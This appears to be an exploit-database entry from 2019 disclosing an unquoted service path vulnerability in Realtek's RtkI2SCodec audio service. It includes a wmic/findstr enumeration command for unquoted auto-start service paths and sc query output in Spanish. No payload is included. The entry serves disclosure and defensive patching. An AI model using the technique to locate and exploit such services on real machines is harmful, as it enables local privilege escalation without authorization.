RTK IIS Codec Service version 6.4.10041.133 suffers from an RtkI2SCodec unquoted service path vulnerability.
a72e0f6414dd9fb6b91d107712eadd2d
# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage:https://www.realtek.com/en/
# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
# Version: 6.4.10041.133
# Tested on: Windows 10 Home Single Language
# CVE : N/A
# Explot-Realtek.txt
#Service Info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
RTK IIS Codec Service RtkI2SCodec C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe Auto
C:\Users\user>sc query RtkI2SCodec
NOMBRE_SERVICIO: RtkI2SCodec
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0